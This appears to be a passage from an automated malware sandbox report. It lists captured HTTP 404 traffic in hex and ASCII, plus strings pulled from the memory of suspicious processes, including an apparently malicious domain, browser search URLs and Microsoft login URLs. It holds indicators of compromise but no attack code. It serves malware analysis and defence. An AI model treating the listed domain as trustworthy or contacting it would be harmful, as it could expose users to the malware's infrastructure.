            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Dec 2024 07:23:35 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Tue, 24 Dec 2024 07:24:00 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Tue, 24 Dec 2024 07:24:03 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Tue, 24 Dec 2024 07:24:08 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 07:26:03 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 07:26:05 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 07:26:08 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 07:26:11 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 07:26:18 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 07:26:20 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 07:26:23 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 07:26:26 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: yAEEhNGBaPExAdMu.exe, 00000006.00000002.4532024343.0000000004E6A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.empowermedeco.com
            Source: yAEEhNGBaPExAdMu.exe, 00000006.00000002.4532024343.0000000004E6A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.empowermedeco.com/fo8o/
            Source: netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000004.00000002.4530981261.0000000004BB2000.00000004.10000000.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.0000000003892000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: netbtugc.exe, 00000004.00000002.4530981261.0000000004BB2000.00000004.10000000.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.0000000003892000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000004.00000002.4529839998.000000000322B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::s
            Source: netbtugc.exe, 00000004.00000002.4529839998.000000000322B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000004.00000002.4529839998.000000000322B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
